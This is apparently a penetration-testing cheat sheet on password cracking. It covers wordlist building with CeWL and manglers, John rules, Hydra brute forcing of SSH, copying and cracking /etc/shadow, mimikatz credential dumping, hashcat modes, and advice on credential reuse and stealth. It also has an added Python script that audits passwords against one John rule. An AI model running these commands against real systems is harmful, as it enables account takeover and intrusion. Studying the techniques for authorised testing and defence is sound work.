Password Cracking

Default Creds

Building words lists

Use content from web pages to build a dictionary. This can include company pages, Facebook, Twitter, and any other resource gathered while doing OSINT on the target. To grab all words from a page, use CeWL.

Password Manglers:

Building Wordlists:

# Grab words from a site
cewl https://example.com -v --with-numbers -w words.txt

# Password mangling; high storage cost for longer lists.
python pydictor.py -extend words.txt --leet 0 1 2 11 21 --level 1 --len 4 16 --occur "<=10" ">0" "<=2" -o /possible/wordlist.lst

# This will create a multiple-GB file. You don't have the storage.
./rsmangler.rb words.txt -yieulcp

John Custom word lists

# Edit john.conf to add a new rule
vim /opt/john/john.conf

# Appends a year from 1900 to 2099 followed by a special char to each word
[List.Rules:YearSpecialChar]
Az"19[0-9][0-9]"$[!@#$%^&*]
Az"20[0-9][0-9]"$[!@#$%^&*]

# Build the list 
john --wordlist=words.lst --rules=YearSpecialChar --stdout > withYearAndChar.txt
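To audit whether a proposed password would be produced by the YearSpecialChar rule above, here is an added Python check; it is not from the page or from John the Ripper, and BASE_WORDS is a constructed stand-in for the words.txt that cewl writes.

```python
import re

# Constructed stand-in for cewl's words.txt (the rule's input wordlist).
BASE_WORDS = {"summer", "acme", "welcome", "password"}

# Mirrors [List.Rules:YearSpecialChar]: word + year 1900..2099 + one of !@#$%^&*
SPECIALS = "!@#$%^&*"
YEAR_SPECIAL_RE = re.compile(
    r"^(?P<word>.+)(?P<year>19\d{2}|20\d{2})(?P<special>[!@#$%^&*])$"
)


def matches_year_special_rule(candidate, base_words=BASE_WORDS):
    """Return (word, year, special) if candidate is exactly word+year+special
    with word in base_words, otherwise None.

    Assumption: the dictionary lookup is case-insensitive, which is broader
    than john (it applies the rule to words exactly as listed); this makes
    the audit conservative rather than permissive."""
    m = YEAR_SPECIAL_RE.match(candidate)
    if not m:
        return None
    word = m.group("word")
    if word not in base_words and word.lower() not in base_words:
        return None
    return word, int(m.group("year")), m.group("special")


def rule_keyspace(base_words=BASE_WORDS):
    """Candidates the rule generates: |words| * 200 years * 8 specials.
    Useful for sizing the --stdout file before writing it."""
    return len(base_words) * 200 * len(SPECIALS)


if __name__ == "__main__":
    for pw in ["Summer2019!", "summer2100!", "acme2020", "unknown1999$"]:
        print(pw, "->", matches_year_special_rule(pw))
    print("rule keyspace for", len(BASE_WORDS), "words:", rule_keyspace())
```

Feed it the real cewl output and a set of sampled passwords to estimate how much of a user population this single rule would reach.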

Brute forcing tools

Hydra:

hydra -l <username> -P <LIST> <ip> <Protocol>

When brute-forcing SSH, limit the number of parallel tasks with -t (hydra defaults to 16 parallel connections, which SSH servers quickly refuse), e.g. 4:

hydra -l <username> -P <LIST> <ip> ssh -t4

John to crack windows hashdump:

john --format=NT <hashes.txt> --wordlist=<wordlist.txt>
john --show --format=LM <hashfile.txt>

John to crack /etc/shadow

# Create a txt file for /etc/passwd and shadow
cp /etc/passwd passwd.txt
cp /etc/shadow shadow.txt

# Unshadow 
unshadow passwd.txt shadow.txt > unshadowed.txt

# Crack with john 
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Windows Hashdump

./mimikatz.exe
privilege::debug
lsadump::lsa /patch

hashcat -m 1000 f4ab68f27303bcb4024650d8fc5f973a rockyou.txt

Cracking NTLMv2-SSP

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 

Wifi Hacking

# Convert PCAP to hashcat: https://hashcat.net/cap2hashcat/index.pl
hashcat -m 22000 file.hc22000 wordslist.txt

Protocols to target

Protocols: telnet, smtp, http, https, smb, rpc, rdp, pop, sql.

Easy ports to hit: 20-23, 25, 80, 443, 135, 139.

General advice

  • Limit parallelism when brute-forcing SSH or you will hit a wall quickly. With hydra, this is done with the -t 4 parameter.

  • Stop after gaining access to one account. Try its creds on everything, and use its creds for further enumeration. Never forget to try sudo -i for easy escalation.

  • Always take a look around the host machine's file system when possible; it is potential low-hanging fruit for enumeration. EX: local user list at /etc/passwd.

  • Never crack hashes on target machine. Speed and stealth will be abysmal.
